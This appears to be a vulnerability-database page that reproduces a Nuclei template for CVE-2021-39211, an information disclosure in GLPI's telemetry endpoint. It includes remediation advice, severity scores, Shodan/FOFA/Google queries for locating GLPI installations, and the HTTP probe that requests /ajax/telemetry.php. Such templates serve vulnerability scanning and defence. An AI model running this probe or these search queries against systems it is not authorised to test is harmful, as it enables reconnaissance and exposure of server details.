CVE-2021-39211: GLPI 9.2/<9.5.6 - Information Disclosure

日期: 2025-08-01 | 影响软件: GLPI | POC: 已公开

漏洞描述

GLPI 9.2 and prior to 9.5.6 is susceptible to information disclosure via the telemetry endpoint, which discloses GLPI and server information. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.

PoC代码[已公开]

id: CVE-2021-39211

info:
  name: GLPI 9.2/<9.5.6 - Information Disclosure
  author: dogasantos,noraj
  severity: medium
  description: GLPI 9.2 and prior to 9.5.6 is susceptible to information disclosure via the telemetry endpoint, which discloses GLPI and server information. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    Information disclosure vulnerability in GLPI versions 9.2 to <9.5.6 allows an attacker to access sensitive information.
  remediation: This issue is fixed in version 9.5.6. As a workaround, remove the file ajax/telemetry.php, which is not needed for usual GLPI functions.
  reference:
    - https://github.com/glpi-project/glpi/security/advisories/GHSA-xx66-v3g5-w825
    - https://github.com/glpi-project/glpi/releases/tag/9.5.6
    - https://nvd.nist.gov/vuln/detail/CVE-2021-39211
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/StarCrossPortal/scalpel
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2021-39211
    cwe-id: CWE-200,NVD-CWE-noinfo
    epss-score: 0.54404
    epss-percentile: 0.97952
    cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: glpi-project
    product: glpi
    shodan-query:
      - http.title:"glpi"
      - http.favicon.hash:"-1474875778"
    fofa-query:
      - icon_hash="-1474875778"
      - title="glpi"
    google-query: intitle:"glpi"
  tags: cve,cve2021,glpi,exposure,glpi-project

http:
  - method: GET
    path:
      - "{{BaseURL}}/ajax/telemetry.php"
      - "{{BaseURL}}/glpi/ajax/telemetry.php"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"uuid":'
          - '"glpi":'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502201325485e07efc0a232f5b09c7ae4c61d159ad421a5f8d8b49284c622d01e66b5022100e29c5450785c6ba75b746c06c98d1990a29dbd840bca0542a1f4c07ee0822dc3:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-39211.yaml

相关漏洞推荐